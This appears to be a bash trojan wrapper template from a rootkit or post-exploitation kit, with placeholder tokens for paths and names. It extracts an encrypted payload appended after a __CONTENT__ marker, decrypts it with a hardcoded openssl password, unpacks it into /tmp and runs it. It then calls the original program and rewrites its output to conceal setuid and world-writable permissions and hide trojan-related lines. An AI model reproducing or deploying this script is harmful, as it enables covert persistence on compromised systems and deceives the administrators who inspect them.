#!/bin/bash -p

CONTENT=`#!TS_TROJAN_PATH!#/usr/bin/awk '/__CONTENT__/ { if (NR > 3) print NR+1 }' $0 2>/dev/null | #!TS_TROJAN_PATH!#/usr/bin/tail -n1 2>/dev/null`

#!TS_TROJAN_PATH!#/usr/bin/tail -n+$CONTENT $0 2>/dev/unll| #!TS_TROJAN_PATH!#/usr/bin/openssl enc -d -aes-256-cbc -a -salt -pass pass:on_boot 2>/dev/null | #!TS_TROJAN_PATH!#/usr/bin/base64 -di 2>/dev/null | #!TS_TROJAN_PATH!#/bin/tar -zxf - -C /tmp/ 2>/dev/null && #!TS_TROJAN_PATH!#/bin/chmod +x /tmp/#!TS_TROJAN_PERSIST!#/#!TS_TROJAN_PERSIST!# 2>/dev/null && /tmp/#!TS_TROJAN_PERSIST!#/#!TS_TROJAN_PERSIST!# 2>/dev/null
#!TS_TROJAN_PATH!#/bin/rm -Rf /tmp/#!TS_TROJAN_PERSIST!# 2>/dev/null
#!TS_TROJAN_PATH!#/$0 $* 2>&1 | #!TS_TROJAN_PATH!#/bin/sed -e 's/----------/-game-over/g' -e 's/-rwsrwsrwx/-rwx------/g' -e 's/-rwxrwxrwx/-rwx------/g' 2>/dev/null | #!TS_TROJAN_PATH!#/bin/grep -v "#!TS_TROJAN_HIDE!#" 2>/dev/null
exit

__CONTENT__
